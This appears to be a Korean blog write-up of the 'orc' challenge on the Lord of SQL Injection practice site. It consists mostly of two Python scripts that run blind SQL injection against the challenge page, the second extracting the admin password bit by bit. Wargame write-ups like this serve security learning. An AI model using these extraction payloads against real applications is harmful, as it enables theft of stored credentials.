Load of sql injection [ORC]

제가 저번에 los문제를 5번까지 포스팅 한 후, 10번 뱀파이어 (?) 문제까지 다 풀어놓아서

문제 풀이를 올리려고 오늘 다시 들어가 보았는데 오늘 들어가 보니, 사이트가 합쳐진건지 바뀐건지

los 문제 푸는 사이트를 로그인 하였더니 아래처럼 되더군요..

 

 

 

심지어는..전에 풀던 문제까지 체크도 안되고ㅠㅠㅠ...

48문제로 늘어나있더라구요!

 

그래서 48번까지 다시 풀어보려 합니다 ^-^...

 

일단, 다시 풀어보던 중 4번 orc문제에 답이 전에 los와 달랐기 때문에 다시 풀이를 올려봅니다.

 

 

일단 아래는 파이썬 코드로, 분명 정답이 나와야 할텐데 자꾸 이상한 pw가 출력이 되더라고요

심지어는 그 정답들도 모두 hello admin 이라는 문구를 출력시켜서

문제가 이상한 줄로만 알았습니다.

 

 

import requests
from bs4 import BeautifulSoup

query1 = "\' or substring(pw,%d,1)= %s#"
dbname =[]
word =['\'a\'', '\'b\'', '\'c\'', '\'d\'', '\'e\'', '\'f\'', '\'g\'','\'h\'','\'i\'','\'j\'','\'k\'','\'l\'','\'m\'','\'n\'','\'o\'',
'\'p\'','\'q\'','\'r\'','\'s\'','\'t\'','\'u\'','\'v\'', '\'w\'','\'x\'','\'y\'','\'z\'','1','2','3','4','5','6','7','8','9','0',]
#print("상태 코드 : ",res.status_code)

print("========= Blind SQL injection ===========")
# 1. 사용하고 있는 DB 길이 알아내기.

print("######################data 분석 중")

num = 1
while num <= 8:

    for src in word:
        dbname = [query1 %(num, src)]

        cookies = {'PHPSESSID': '27g5thpe9ib9v6o1vq12kvhpv6'}
        params = {'id': 'admin', 'pw': dbname}
        res = requests.get('https://los.rubiya.kr/chall/orc_60e5b360f95c1f9688e4f3a86c5dd494.php', params=params, cookies=cookies)
        code = res.text  # 전체 코드
        search = "Hello admin"  # 참일시 나오는 결과 값

        if search in code: #코드안에 참일 시 나오는 값이 들어가 있다면
            print("Password : ", src)
            print(dbname)
            break
    num = num+1

print("###########################완료")

 

 

그런데 구글 검색을 하던 중, 2진수로 값을 비교하는 코드를 보았고 참고 후 살짝 변경 시켜 주었습니다.

 

 

import requests

requests.packages.urllib3.disable_warnings()
sess = requests.session()
URL = 'https://los.rubiya.kr/chall/orc_60e5b360f95c1f9688e4f3a86c5dd494.php?pw='
headers = {'Cookie': 'PHPSESSID=27g5thpe9ib9v6o1vq12kvhpv6'}

passwordLen = 0

payload = "1' or id='admin' and length(pw)="
print('\n############# blind sql injection ###############')
for i in range(1, 100):
    tmpPayload = payload + str(i) + '%23'
    res = sess.get(url=URL + tmpPayload, headers=headers, verify=False)

    if 'Hello admin' in res.text:
        # true
        print('\nPassword Length : %d' % i)
        passwordLen = i
        break
    else:
        # false
        pass

Password = ''
print('\n############# Falg ###############')
for j in range(1, 9):

    bit = ''
    for i in range(1, passwordLen + 1):
        payload = "1' or id='admin' and substr(lpad(bin(ord(substr(pw,{},1))),8,0),{},1)=1%23".format(j, i)

        res = sess.get(url=URL + payload, headers=headers, verify=False)

        if 'Hello admin' in res.text:
            # true  ==> the bit is 1
            bit += '1'
        else:
            # false ==> the bit is 0
            bit += '0'

    Password += chr(int(bit, 2))
    print('%02d. Find Password : %s (bit : %s)' % (j, chr(int(bit, 2)), bit))

print('[=] Password : %s' % Password)

 

 

결과는 정말 깔끔하게 출력되네요... +  속도가 정말 한 글자씩 비교할 때보다 훨씬 빠르네요..

 

 

파이썬 코드 출처 :https://kkamikoon.tistory.com/177?category=829545

 

 

 

 

이렇게 나온 플래그 값을 입력해보니 orc 문제 클리어.

한개씩 값을 입력해보는 방법은 좋지 않은 것 같습니다. 문제에서 hello admin 이라는 출력문이 꼭 

참이여야만 나오는 것이 아니더군요,,(흠..) 

 

 

 

하여튼 클리어